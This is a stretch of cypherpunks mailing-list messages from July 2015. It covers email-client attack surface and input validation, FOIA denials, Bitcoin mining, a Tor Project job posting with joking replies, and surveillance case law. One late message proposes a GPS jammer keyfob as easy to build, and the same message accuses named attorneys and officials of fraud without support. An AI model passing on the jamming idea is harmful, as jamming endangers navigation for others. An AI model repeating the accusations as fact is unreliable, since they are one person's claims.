Date: Fri, 10 Jul 2015 17:41:23 -0400
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To: <20150710081130.GB2529@sivokote.iziade.m$>
References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$>
Message-ID:

On Fri, Jul 10, 2015 at 4:11 AM, Georgi Guninski wrote:
> On Fri, Jul 10, 2015 at 12:17:57AM -0700, Seth wrote:
>> On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote:
>>
>> >http://ptrace.fefe.de/fpalm30c3.jpg
>>
>> I actually appreciate content posted in message, get tired of having
>> to fire up a browser for links. Also every click on a browser link
>> is a potential attack whereas plain-text in an email is not.
>
> Are you sure plain-text email is not potential attack?
>
> There have been many bugs in text mail clients.
>
> IIRC shell shock affected qmail local delivery (and maybe
> procmail).

Affection is possible...
http://www.gossamer-threads.com/lists/qmail/users/138578

Moral: Validate input and pipelines. Even if only a silly regex sanity filter on
instruction metadata (email addresses), ie: [A-Za-z0-9._@+-] mod utf-8
Security is not being liberal in what you accept.

From grarpamp at gmail.com Fri Jul 10 15:26:07 2015
From: grarpamp at gmail.com (grarpamp)
Date: Fri, 10 Jul 2015 18:26:07 -0400
Subject: cypherpunks Digest, Vol 25, Issue 9
In-Reply-To:
References:
Message-ID:

On Fri, Jul 10, 2015 at 6:25 AM, ksenia bellman wrote:
> [snip]

- Do not top post.
- Do not reply including entire bulk digests, cut them down to relevant.
- Do not use "digest vol issue" as subject, use the same subject as whatever specific message in the digest you are replying to.

From coderman at gmail.com Fri Jul 10 18:42:41 2015
From: coderman at gmail.com (coderman)
Date: Fri, 10 Jul 2015 18:42:41 -0700
Subject: FOIPA adventures
In-Reply-To:
References:
Message-ID:

fun friday FOIA denials:

FU from FBI:

Rejected
DRTBox
Martin Peck made this request to Federal Bureau of Investigation of the United States of America.
- https://www.muckrock.com/foi/united-states-of-america-10/drtbox-18541/

Rejected
DRTBeBoeingBox
Martin Peck made this request to Federal Bureau of Investigation of the United States of America.
- https://www.muckrock.com/foi/united-states-of-america-10/drtbeboeingbox-18708/

Rejected
KingFishing
Martin Peck made this request to Federal Bureau of Investigation of the United States of America.
- https://www.muckrock.com/foi/united-states-of-america-10/kingfishing-18594/

don't think that's the end :P

best regards,

From grarpamp at gmail.com Fri Jul 10 17:07:14 2015
From: grarpamp at gmail.com (grarpamp)
Date: Fri, 10 Jul 2015 20:07:14 -0400
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$>
Message-ID:

On Fri, Jul 10, 2015 at 7:31 PM, Cathal (Phone) wrote:
> And if your regex engine has vulns? ;)

And your software, and hardware, and law... it's just defense in depth, stack em all up and hopefully one will remain standing in your favor. If not, well, time to unplug and go be a farmer. With luck your combine, market and customers will still be functional...

From dan at geer.org Fri Jul 10 17:25:22 2015
From: dan at geer.org (dan at geer.org)
Date: Fri, 10 Jul 2015 20:25:22 -0400
Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users
In-Reply-To: Your message of "Wed, 08 Jul 2015 03:40:47 -0400."
Message-ID: <20150711002522.D66D92280CA@palinka.tinho.net>

| The Senate Intelligence Committee secretly voted on June 24 in favor
| of legislation requiring e-mail providers and social media sites to
| report suspected terrorist activities. The legislation, approved 15-0
| in a closed-door hearing, remains "classified." The relevant text is
| contained in the 2016 intelligence authorization...

In a court of logic, this makes sense. These firms' entire business is in content inspection of one form or another plus traffic analysis of one form or another and making decisions on what they find in content or in relationships and so forth and so on, so making them incrementally responsible for what they find or could find is logical and directly so to lawmakers.

Harvard Law professor Jonathan Zittrain famously noted that if you use online services that are free, "You are not the customer, you are the product." Why? Because what is observable is observed, what is observed is sold, and users are always observable, even when they are anonymous.

If I were a lawmaker, I'd follow that logic just as they have.

No, I don't like it, either.

--dan

From alfonso.degregorio at gmail.com Fri Jul 10 16:50:11 2015
From: alfonso.degregorio at gmail.com (Alfonso De Gregorio)
Date: Fri, 10 Jul 2015 23:50:11 +0000
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$>
Message-ID:

On Fri, Jul 10, 2015 at 11:31 PM, Cathal (Phone) wrote:
> And if your regex engine has vulns? ;)

Exactly. Just consider, for instance, the long "lineage" of vulnerabilities affecting PCRE libraries.

Alfonso

From cathalgarvey at cathalgarvey.me Fri Jul 10 16:31:55 2015
From: cathalgarvey at cathalgarvey.me (Cathal (Phone))
Date: Sat, 11 Jul 2015 00:31:55 +0100
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$>
Message-ID:

And if your regex engine has vulns? ;)

On 10 July 2015 22:41:23 GMT+01:00, grarpamp wrote:
>On Fri, Jul 10, 2015 at 4:11 AM, Georgi Guninski
> wrote:
>> On Fri, Jul 10, 2015 at 12:17:57AM -0700, Seth wrote:
>>> On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote:
>>>
>>> >http://ptrace.fefe.de/fpalm30c3.jpg
>>>
>>> I actually appreciate content posted in message, get tired of having
>>> to fire up a browser for links. Also every click on a browser link
>>> is a potential attack whereas plain-text in an email is not.
>>
>> Are you sure plain-text email is not potential attack?
>>
>> There have been many bugs in text mail clients.
>>
>> IIRC shell shock affected qmail local delivery (and maybe
>> procmail).
>
>Affection is possible...
>http://www.gossamer-threads.com/lists/qmail/users/138578
>
>Moral: Validate input and pipelines. Even if only a silly regex sanity
>filter on
>instruction metadata (email addresses), ie: [A-Za-z0-9._@+-] mod utf-8
>Security is not being liberal in what you accept.

--
Sent from my Android device with K-9 Mail. Please excuse my brevity.

From hozer at hozed.org Sat Jul 11 07:01:12 2015
From: hozer at hozed.org (Troy Benjegerdes)
Date: Sat, 11 Jul 2015 09:01:12 -0500
Subject: speaking of Bitcoin ... the july4th split
In-Reply-To:
References:
Message-ID: <20150711140112.GA27932@nl.grid.coop>

On Mon, Jul 06, 2015 at 04:06:36AM +0900, Lodewijk andré de la porte wrote:
> Half the net is SPV... MINING???
>
> They got what they had coming, though.
>
> Very strange to not spend a tease on full validation :s
>
> Maybe they hope to save some time and start mining that new block earlier?
> Seems they lost quite a bit more than they might've ever saved now.
Give me a large mining pool with a dedicated low-latency (worldwide) network and I bet I can show a marginally higher rate of return (more blocks) by running SPV mining software.

What's unknown is if the network + wrong-fork costs exceed the return from being able to start mining a new block sooner or not.

This is a very small advantage with Bitcoin. But with any short-block coin (litecoin) or the 1-minute altcoins, seconds (or maybe even milliseconds) matter.

On the 1-minute alts you could have 40% of the hashpower and probably get 60-80% of the blocks by starting mining earlier and then mining on top of blocks you just found.

From hozer at hozed.org Sat Jul 11 07:34:01 2015
From: hozer at hozed.org (Troy Benjegerdes)
Date: Sat, 11 Jul 2015 09:34:01 -0500
Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc]
In-Reply-To: <559ca80a.e40f370a.1ccb2.17c7@mx.google.com>
References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com> <559c93ca.656b8c0a.4ba8.2f81@mx.google.com> <559C9E94.8010603@riseup.net> <559ca80a.e40f370a.1ccb2.17c7@mx.google.com>
Message-ID: <20150711143401.GB27932@nl.grid.coop>

On Wed, Jul 08, 2015 at 01:33:33AM -0300, Juan wrote:
> On Tue, 07 Jul 2015 20:52:52 -0700
> odinn wrote:
>
> > Satoshi was
> > apparently thinking about that same issue, of a decentralized market
> > within bitcoin, but it just didn't get finished.
> >
> > And in February of 2010, it was stripped out of bitcoin.
> >
> > (Insert ripping sound here.)
> >
> > https://github.com/bitcoin/bitcoin/commit/5253d1ab77fab1995ede03fb934edd
> > 67f1359ba8
> >
> > Go OpenBazaar, etc. They (and some other similar projects) are
> > carrying the torch of decentralized marketplaces that don't require
> > legacy institutions to operate.
> >
>
> Thanks. I wasn't aware that the decentralized marketplace
> problem was being worked on at that time and by Satoshi.
> Interesting.
>

So what do we need to put that back in to a working cryptocoin?

I see all this nonsense about putting stuff 'on top of' bitcoin, but it seems like it really ought to be integrated, or if not integrated, at least follow the unix philosophy of individual tools you can compose together.

Libbitcoin seems to have had that 'tools' approach, but it appears to have no use case, and can you even mine an altchain with it?

From hozer at hozed.org Sat Jul 11 07:51:51 2015
From: hozer at hozed.org (Troy Benjegerdes)
Date: Sat, 11 Jul 2015 09:51:51 -0500
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To:
References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$>
Message-ID: <20150711145151.GD27932@nl.grid.coop>

On Fri, Jul 10, 2015 at 08:07:14PM -0400, grarpamp wrote:
> On Fri, Jul 10, 2015 at 7:31 PM, Cathal (Phone)
> wrote:
> > And if your regex engine has vulns? ;)
>
> And your software, and hardware, and law... it's just defense
> in depth, stack em all up and hopefully one will remain standing
> in your favor. If not, well, time to unplug and go be a farmer.
> With luck your combine, market and customers will still be functional...

ROTFL that's funny.

I won't argue with go be a farmer, but the whole unplug bit would leave me with a lot of leftovers.

The antique combine will work, but what good is 50 tons of corn if I can't get it to China? I can't drink that much moonshine myself.

Go be a farmer and work on fabricating silicon in your #farmcmos fab.

(did you know corncobs have enough silica to be good abrasives?)
--
----------------------------------------------------------------------------
Troy Benjegerdes 'da hozer' hozer at hozed.org
7 elements earth::water::air::fire::mind::spirit::soul grid.coop

Never pick a fight with someone who buys ink by the barrel,
nor try buy a hacker who makes money by the megahash

From Rayzer at riseup.net Sat Jul 11 12:55:06 2015
From: Rayzer at riseup.net (Razer)
Date: Sat, 11 Jul 2015 12:55:06 -0700
Subject: cypherpunks Digest, Vol 25, Issue 9
In-Reply-To:
References:
Message-ID: <55A1749A.1060808@riseup.net>

On 07/10/2015 03:26 PM, grarpamp wrote:
> On Fri, Jul 10, 2015 at 6:25 AM, ksenia bellman wrote:
>> [snip]
>
> - Do not reply including entire bulk digests, cut them down to relevant.

[Snigger]

No one pays by the byte anymore (...coderman).

[extracting tongue from cheek]

RR

From tom at ritter.vg Sat Jul 11 12:19:59 2015
From: tom at ritter.vg (Tom Ritter)
Date: Sat, 11 Jul 2015 14:19:59 -0500
Subject: progression of technologies
In-Reply-To: <20150710155812.D78CF2281ED@palinka.tinho.net>
References: <20150710155812.D78CF2281ED@palinka.tinho.net>
Message-ID:

On 10 July 2015 at 10:58, wrote:
> Well, now we are into dueling Supreme Court cases; see
>
> http://caselaw.findlaw.com/us-supreme-court/533/27.html
>
> Kyllo v. United States (2001)
>
> Despite the Court's attempt to draw a line that is "not only
> firm but also bright," ante, at 12, the contours of its new rule
> are uncertain because its protection apparently dissipates as
> soon as the relevant technology is "in general public use," ante,
> at 6-7. Yet how much use is general public use is not even hinted
> at by the Court's opinion, which makes the somewhat doubtful
> assumption that the thermal imager used in this case does not
> satisfy that criterion.
In any event, putting aside its lack
> of clarity, this criterion is somewhat perverse because it seems
> likely that the threat to privacy will grow, rather than recede,
> as the use of intrusive equipment becomes more readily available.

Yes! That's the case I was obliquely referring to. Sorry, I kind of glazed over that part of your argument in the article.

> That reads, to me, that what the public adopts limits what I can
> do or expect.

I guess where we quibble is I'm skeptical that the general public (as defined by the courts?) will (ever?) adopt the types of tools you refer to (uniquely identifying individuals based on electromagnetics, tracking tire pressure sensors.) I don't think the 'general public' has adopted thermal imagers. These will make their way into industry... (advertisers tracking WiFi probes in malls obviously).

So my wonder now is if industry adopting a technology is sufficient for the courts to qualify as 'general public'. But this, at best, only affects exotic technology. We're already fighting this battle.

Automated license plate readers have never (?) been challenged (successfully?). They are an extension of "a police officer just watching a highway" which is legal. And the courts like extensions of things that are already done - see bulk collection of metadata!

You're right - collection of this data by personals or corporations, and selling it, is indeed the right battleground. I don't think the answer is correlation, but the collection, as you say in the last paragraph.
-tom

From Rayzer at riseup.net Sat Jul 11 15:49:46 2015
From: Rayzer at riseup.net (Razer)
Date: Sat, 11 Jul 2015 15:49:46 -0700
Subject: Fwd: Executive Director Needed, Tor Project
In-Reply-To:
References:
Message-ID: <55A19D8A.6050300@riseup.net>

-------- Forwarded Message --------
Subject: Fwd: Executive Director, Tor Project
Date: Fri, 10 Jul 2015 17:00:47 -0700
From: Ilya Mouzykantskii
Reply-To: liberationtech
To: bscs at cs.stanford.edu, liberationtech at lists.stanford.edu
CC: Larry Diamond
Newsgroups: gmane.technology.liberationtech
References:

One of the most important jobs in the post-Snowden tech world. Forward widely!

---------- Forwarded message ----------
From: *Rob Reich*
Date: Fri, Jul 10, 2015 at 11:11 AM
Subject: Executive Director, Tor Project
To: interestingjobs at lists.stanford.edu

Hello all,

The Tor Project aims to guarantee privacy and open communications online. Their signature product is the Tor Browser.

https://www.torproject.org

Please share this announcement widely.

Rob

http://www.fossjobs.net/job/6669/executive-director-at-torproject-inc/

The Situation

The Tor Project, one of the world’s strongest advocates for privacy and anonymous, open communications is currently seeking an experienced Executive Director to take the helm. The new Executive Director will spearhead key initiatives to make the organization even more robust in its fight to advance human rights and freedoms by creating and deploying anonymity and privacy technologies, advancing their scientific and popular understanding, and encouraging their use.

The Position

The position provides the high-profile opportunity to assume the voice and face of Tor to the world, and particularly to the global community of Internet organizations dedicated to maintaining a stable, secure and private Internet. In this position, the successful candidate will be able to exercise their deep leadership experience to manage a virtual team of culturally diverse volunteer developers.
The candidate will have the opportunity to draw support from their stature in the wider community of Internet privacy foundations and activist organizations to advance external development initiatives.

The Organization

Founded in 2006, this 501(c)(3) research NGO, provides free software that enables anonymous Internet communication world-wide. Tor's mission is to return control over Internet security and privacy to users. Tor's members, users, and sponsors include governmental and nongovernmental organizations, the US Navy, Indymedia, Electronic Frontier Foundation, journalists and media organizations, corporations and law enforcement organizations. The Tor Project received the Free Software Foundation's 2010 Award for Projects of Social Benefit.

The Ideal Candidate

The ideal candidate will dive head first into the activities of advocacy for the Internet privacy movement. They will enjoy exercising their strong network of connections in fundraising efforts. They will take satisfaction in establishing a highly collaborative and productive culture in a volunteer-driven, virtual organization and will appreciate the opportunity to build consensus among diverse cultural groups as they all work toward the common mission and goal. The successful candidate will have a passion for the ideals behind Internet privacy and welcome the opportunity to make strides for the cause to establish anonymous Internet communications.

The Opportunity

The successful candidate will welcome the opportunity to create an organizational culture that creates conditions and infrastructures vital for Tor's continued success and relevance to the cause. This is a chance to be known for leadership agility at the helm of an organization forefront in the drive to enable free, private, non-censored Internet communication for citizens everywhere.

The Compensation

As leader of the Tor team, the successful candidate receives a highly competitive compensation package.
If you know someone who might be interested, please call, or ask them to call.

Judy Tabak
The Wentworth Company
479 West Sixth Street, San Pedro, CA 90731
(310) 732-2321
JudyTabak at wentco.com

From jya at pipeline.com Sat Jul 11 13:41:26 2015
From: jya at pipeline.com (John Young)
Date: Sat, 11 Jul 2015 16:41:26 -0400
Subject: progression of technologies
In-Reply-To:
References: <20150710155812.D78CF2281ED@palinka.tinho.net>
Message-ID:

This is productive discussion for addressing what's happening now and coming up in the race between law and technology, cartoonishly in the press as between whales and germs, more realistically, the two swapping places, running different races, taking short-cuts, indicting, pleading, informing, lying, bribing, cheating, rigging races, hiring assassins and stand-ins, dual hats, wild cards, lone wolves, entrapment, duplicity, megadeath threats, hacks, injections, implantations, porous treaties, incessant violations, and above all evergrowing heaping piles of dung of the devil. Concentration of wealth by lawful cheating is comparable to explosively squeezing the pit to see if the atmosphere ignites.

At 03:19 PM 7/11/2015, you wrote:
>On 10 July 2015 at 10:58, wrote:
> > Well, now we are into dueling Supreme Court cases; see
> >
> > http://caselaw.findlaw.com/us-supreme-court/533/27.html
> >
> > Kyllo v. United States (2001)
> >
> > Despite the Court's attempt to draw a line that is "not only
> > firm but also bright," ante, at 12, the contours of its new rule
> > are uncertain because its protection apparently dissipates as
> > soon as the relevant technology is "in general public use," ante,
> > at 6-7.
Yet how much use is general public use is not even hinted
> > at by the Court's opinion, which makes the somewhat doubtful
> > assumption that the thermal imager used in this case does not
> > satisfy that criterion. In any event, putting aside its lack
> > of clarity, this criterion is somewhat perverse because it seems
> > likely that the threat to privacy will grow, rather than recede,
> > as the use of intrusive equipment becomes more readily available.
>
>Yes! That's the case I was obliquely referring to. Sorry, I kind of
>glazed over that part of your argument in the article.
>
> > That reads, to me, that what the public adopts limits what I can
> > do or expect.
>
>I guess where we quibble is I'm skeptical that the general public (as
>defined by the courts?) will (ever?) adopt the types of tools you
>refer to (uniquely identifying individuals based on electromagnetics,
>tracking tire pressure sensors.) I don't think the 'general public'
>has adopted thermal imagers. These will make their way into
>industry... (advertisers tracking WiFi probes in malls obviously).
>
>So my wonder now is if industry adopting a technology is sufficient
>for the courts to qualify as 'general public'. But this, at best, only
>affects exotic technology. We're already fighting this battle.
>
>Automated license plate readers have never (?) been challenged
>(successfully?). They are an extension of "a police officer just
>watching a highway" which is legal. And the courts like extensions of
>things that are already done - see bulk collection of metadata!
>
>You're right - collection of this data by personals or corporations,
>and selling it, is indeed the right battleground. I don't think the
>answer is correlation, but the collection, as you say in the last
>paragraph.
>
>-tom

From griffin at cryptolab.net Sat Jul 11 18:44:44 2015
From: griffin at cryptolab.net (Griffin Boyce)
Date: Sat, 11 Jul 2015 21:44:44 -0400
Subject: Executive Director Needed, Tor Project
In-Reply-To: <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com>
References: <55A19D8A.6050300@riseup.net> <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com>
Message-ID: <90b7e493c2083965919e8fb549c3b016@cryptolab.net>

Juan wrote:
> Zenaan Harkness wrote:
>> Juan for Executive Director, position soon to be retitled as
>> Sanity Director :)
>
> heh ;)

Whoa whoa whoa. We all know that Vermin Supreme is the community favorite to become the next Tor E.D. Juan's got no chance.

~Griffin

From juan.g71 at gmail.com Sat Jul 11 18:28:43 2015
From: juan.g71 at gmail.com (Juan)
Date: Sat, 11 Jul 2015 22:28:43 -0300
Subject: Executive Director Needed, Tor Project
In-Reply-To:
References: <55A19D8A.6050300@riseup.net>
Message-ID: <55a1c2a6.51958c0a.0522.ffff8e16@mx.google.com>

On Sun, 12 Jul 2015 00:27:41 +0000 Zenaan Harkness wrote:

> Juan! Juan!! Juan!!!
>
> Juan for Executive Director, position soon to be retitled as
> Sanity Director :)

heh ;)

>
> While we're at it: Juan for presidenté!

Thank You Zenaan. Yes, I've been thinking about these problems.

What we first need is an anarchist state. The government of our anarchist might require some sort of leadership (otherwise chaos would ensue), but I think the "president" title is a bit too authoritarian. Therefore I won't be El Presidente but a Sultan (Sultan es-Selatin)

And of course Zenaan, I hereby grant you the honor of being our Greatest-Grand-Vizier =)

Now, since ours is an anarchist cypherpunk state, mostly concerned with defending the cyber-rights of the masses, we need to get as much funding as possible from the Pentagon.

The millions we get from the pentagon will be used to create a fake anonymity network which is actually used to promote the interests of the US military and US corporations.
I think a fitting name for such a criminal endeavor, I mean humanitarian community is : "The Tor Project".

Our anarchist state must have other assets too. For instance, we could hire some high ranking CIA officials. I tend to like people whose initials are DG. Like, I don't know, Dan Geer.

And, our state needs an official 'decentralized' medium of exchange. I propose bitcoin! Bitcoin is now really maturing into a robust system backed by just the right people.

https://blog.xapo.com/announcing-xapos-advisory-board/

So, this is it. Ah, a nice touch might be a mailing list in which random people praise the marines. And other random people defend the marines admirers from unfair attacks.

>
> :D
>
> Love you bro,
> Zenaan
>
>
> > Subject: Fwd: Executive Director, Tor Project
> > Date: Fri, 10 Jul 2015 17:00:47 -0700
>
> > One of the most important jobs in the post-Snowden tech world.
> ...
>

From coderman at gmail.com Sun Jul 12 00:20:30 2015
From: coderman at gmail.com (coderman)
Date: Sun, 12 Jul 2015 00:20:30 -0700
Subject: speaking of Bitcoin ... the july4th split
In-Reply-To: <20150711140112.GA27932@nl.grid.coop>
References: <20150711140112.GA27932@nl.grid.coop>
Message-ID:

On 7/11/15, Troy Benjegerdes wrote:
> ...
> Give me a large mining pool with a dedicated low-latency (worldwide)
> network and I bet I can show a marginally higher rate of return...

a malicious advantage; that's what we've not seen taken opportunity of yet...

From coderman at gmail.com Sun Jul 12 00:23:44 2015
From: coderman at gmail.com (coderman)
Date: Sun, 12 Jul 2015 00:23:44 -0700
Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?]
In-Reply-To: <20150711145151.GD27932@nl.grid.coop>
References: <20150710070020.GF61602@r4> <20150710081130.GB2529@sivokote.iziade.m$> <20150711145151.GD27932@nl.grid.coop>
Message-ID:

On 7/11/15, Troy Benjegerdes wrote:
> ...
> I won't argue with go be a farmer, but the whole unplug bit would leave
> me with a lot of leftovers.
as a farmer with 7 horses, 9 goats, 3 chickens, 3 dogs, 6 cats, the trick is to do both. or actually all four?

future is full of more jobs than one. we're living on borrowed time.

best regards,

From zen at freedbms.net Sat Jul 11 17:27:41 2015
From: zen at freedbms.net (Zenaan Harkness)
Date: Sun, 12 Jul 2015 00:27:41 +0000
Subject: Executive Director Needed, Tor Project
In-Reply-To: <55A19D8A.6050300@riseup.net>
References: <55A19D8A.6050300@riseup.net>
Message-ID:

Juan! Juan!! Juan!!!

Juan for Executive Director, position soon to be retitled as Sanity Director :)

While we're at it: Juan for presidenté!

:D

Love you bro,
Zenaan

> Subject: Fwd: Executive Director, Tor Project
> Date: Fri, 10 Jul 2015 17:00:47 -0700

> One of the most important jobs in the post-Snowden tech world.
...

From coderman at gmail.com Sun Jul 12 00:33:55 2015
From: coderman at gmail.com (coderman)
Date: Sun, 12 Jul 2015 00:33:55 -0700
Subject: FOIPA adventures
In-Reply-To:
References:
Message-ID:

ready to spend a fortune to see this through. next move FBI?

https://www.muckrock.com/foi/united-states-of-america-10/metadataz-19638/

"""
FOIA processing notes associated with requests #1331086-000, #1331360-000, #1331082-000. Please include processing notes for this request, even if request is denied in part. Please identify individuals responsible for any aspect of FOIA processing in the processing notes, along with explanation of their involvement if not typically assigned FOIA responsibilities for the record systems above.
"""

On 7/10/15, coderman wrote:
> fun friday FOIA denials:
>
> FU from FBI:
>
>
> Rejected
> DRTBox
> Martin Peck made this request to Federal Bureau of Investigation of
> the United States of America.
> - https://www.muckrock.com/foi/united-states-of-america-10/drtbox-18541/
>
>
> Rejected
> DRTBeBoeingBox
> Martin Peck made this request to Federal Bureau of Investigation of
> the United States of America.
> -
> https://www.muckrock.com/foi/united-states-of-america-10/drtbeboeingbox-18708/
>
>
> Rejected
> KingFishing
> Martin Peck made this request to Federal Bureau of Investigation of
> the United States of America.
> -
> https://www.muckrock.com/foi/united-states-of-america-10/kingfishing-18594/
>
>
> don't think that's the end :P
>
>
>
> best regards,
>

From guninski at guninski.com Sun Jul 12 03:10:50 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Sun, 12 Jul 2015 13:10:50 +0300
Subject: Someone recommends the movie "Inequality for All"
Message-ID: <20150712101050.GA2534@sivokote.iziade.m$>

Someone who watches a lot of movies recommends
Inequality for All
http://www.imdb.com/title/tt2215151/
===
A documentary that follows former U.S. Labor Secretary Robert Reich as he looks to raise awareness of the country's widening economic gap.
===

I haven't watched it yet.

From vbotka at gmail.com Sun Jul 12 05:28:41 2015
From: vbotka at gmail.com (Vladimir Botka)
Date: Sun, 12 Jul 2015 14:28:41 +0200
Subject: Someone recommends the movie "Inequality for All"
In-Reply-To: <20150712101050.GA2534@sivokote.iziade.m$>
References: <20150712101050.GA2534@sivokote.iziade.m$>
Message-ID: <20150712142841.73ba66b3@planb.netng.org>

Hi Georgi, all

On Sun, 12 Jul 2015 13:10:50 +0300 Georgi Guninski wrote:
> Someone who watches a lot of movies recommends
> Inequality for All
> http://www.imdb.com/title/tt2215151/
> ===
> A documentary that follows former U.S. Labor Secretary Robert Reich as
> he looks to raise awareness of the country's widening economic gap.
> ===
> I haven't watched it yet.

For those interested, it might be a good idea to review also the recent publication on this topic.

http://www.economist.com/news/books-and-arts/21653596-anthony-atkinson-godfather-inequality-research-growing-problem-mind-gap

"The author does not mind speaking uncomfortable truths."

Regards,
Vladimír Botka

From wirelesswarrior at safe-mail.net Sun Jul 12 13:18:42 2015
From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net)
Date: Sun, 12 Jul 2015 16:18:42 -0400
Subject: progression of technologies
Message-ID:

-------- Original Message --------
From: jim bell
Apparently from: cypherpunks-bounces at cpunks.org
To: Tom Ritter , "dan at geer.org"
Cc: cpunks
Subject: Re: progression of technologies
Date: Sun, 12 Jul 2015 18:53:15 +0000 (UTC)

It would seem that a GPS jammer keyfob, that could be turned off when desired, would do the trick. The GPS signal at ground level is very weak and only works due to a huge process gain. Narrowband jamming will desensitize the closeby tracker's front end easily countering that process gain without jamming more distant GPS receivers. Building such a jammer from cheap and available components should be easy.

>
>
> From: Tom Ritter
> On 10 July 2015 at 10:58, wrote:
>
> >> Well, now we are into dueling Supreme Court cases; see
> >>
> >> http://caselaw.findlaw.com/us-supreme-court/533/27.html
> >> Kyllo v. United States (2001)
> >> Despite the Court's attempt to draw a line that is "not only
> >> firm but also bright," ante, at 12, the contours of its new rule
> >> are uncertain because its protection apparently dissipates as
> >> soon as the relevant technology is "in general public use," ante,
> >> at 6-7. Yet how much use is general public use is not even hinted
> >> at by the Court's opinion, which makes the somewhat doubtful
> >> assumption that the thermal imager used in this case does not
> >> satisfy that criterion. In any event, putting aside its lack
> >> of clarity, this criterion is somewhat perverse because it seems
> >> likely that the threat to privacy will grow, rather than recede,
> >> as the use of intrusive equipment becomes more readily available.
>
> >Yes!
That's the case I was obliquely referring to. Sorry, I kind of > >glazed over that part of your argument in the article. > > > That reads, to me, that what the public adopts limits what I can > > do or expect. > > >I guess where we quibble is I'm skeptical that the general public (as > >defined by the courts?) will (ever?) adopt the types of tools you > >refer to (uniquely identifying individuals based on electromagnetics, > >tracking tire pressure sensors.) I don't think the 'general public' > >has adopted thermal imagers. These will make their way into > >industry... (advertisers tracking WiFi probes in malls obviously). > > Months ago, FLIR announced an IR-imaging add-on for IPhones, which is tiny. However, just a month or two ago I saw a media reference to a (very tiny) T-shaped device, intended to plug into the micro-USB jack of a cell phone, that did IR imaging. As I recall, very economical, but even then the majority of the population won't buy, simply because they have no need for such a thing most of the time. > > > > > > >So my wonder now is if industry adopting a technology is sufficient > >for the courts to qualify as 'general public'. But this, at best, only > >affects exotic technology. We're already fighting this battle. > > >Automated license plate readers have never (?) been challenged > >(successfully?). They are an extension of "a police officer just > >watching a highway" which is legal. And the courts like extensions of > >things that are already done - see bulk collection of metadata! > > > This 'extension' principle doesn't always work. In 2012, the Supreme Court ruled (US v. Jones) https://www.law.cornell.edu/wex/united_states_v._jones_%282012%29 that police could not place a GPS tracking device on a car without a warrant. 
One argument that has been rejected in lower-court cases was the idea that in principle, a car's movements could be tracked with an army of police, one per street corner, so that a GPS tracking bug simply automated that process. One problem that argument is that society not only doesn't have the resources to accomplish such a blanket coverage of an area, and that even if practical, society may not necessarily want such an intrusive system to exist. > > This issue was (secretly) quite relevant to me. Federal authorities apparently installed a tracking device on a car I used, probably in about April 2000, without a warrant. Presumably, if challenged they would have been claiming to follow a 9th Circuit Court of Appeals decision from 1999, U.S. v. McIver, which had allowed the placement of a GPS tracking device on a truck seen at the location of a marijuana growing operation. The problem with this justification, however, is that at least in McIver, there was an actual crime involved, and the truck was plausibly involved in that crime. In my case, after my release from prison in April 2000, nobody alleged that I was engaging in any crime. The McIver case didn't rule that police could simply choose to place a GPS tracking device on ANY car, for no reason, and even without 'probable cause' or 'reasonable suspicion'. > > What was particularly devious (and I call illegal) was that later, probably in October 2000, the Feds actually obtained a warrant for the placement of ANOTHER tracking device on the same car (which, of course, may have ended up being the same device!) WITHOUT telling the judge that a tracking device was already on the car, and had been so since at least as early as April 2000. Why the subterfuge? They later used the result of the tracking device (at least, the portion taken after the October warrant) against me in court. But they continued to conceal the fact that a GPS device had been placed since perhaps April 2000. 
Presumably, they concealed that because they would have had to explain, in court, why they were tracking me, without a warrant, and despite the fact that they had no 'probable cause' nor 'reasonable suspicion' to do so. To conceal that, they obtained the warrant, making it appear that the GPS surveillance started in October 2000. This was fraud, because in order to obtain a warrant, they have to explain WHY they need the GPS device installed. Clearly, since a GPS device was already installed in the car, there was no need to place one. THAT misrepresented the need to the judge. > > You might ask, "Jim, why didn't you complain about this during the trial". As you might know, I was given a long series of lawyers who, rather than being the first line of defense for me, were actually the first line of OFFENCE for the government. What the average person doesn't understand is that a defense attorney, colluding with the government, has virtually unlimited power to sabotage his client's case, and that was precisely what happened to me. The crooked attorney was Robert Leen. > > And it turned out that the government had a powerful motivation, or at least some of its employees: They had faked an 'appeal' case in the 9th Circuit, 99-30210, forging at least two filings as if I had done them 'pro se', as if I was bring that case. I did not, and I wasn't aware of the pre-May 2000 existence of that faked case until June 2003, when I first saw that case's docket. The crooked attorney who concealed this from me was Jonathan Solovy. > Jim Bell > > > > > > > > > > > > > > > > > > > -------------- next part -------------- A non-text attachment was scrubbed... 
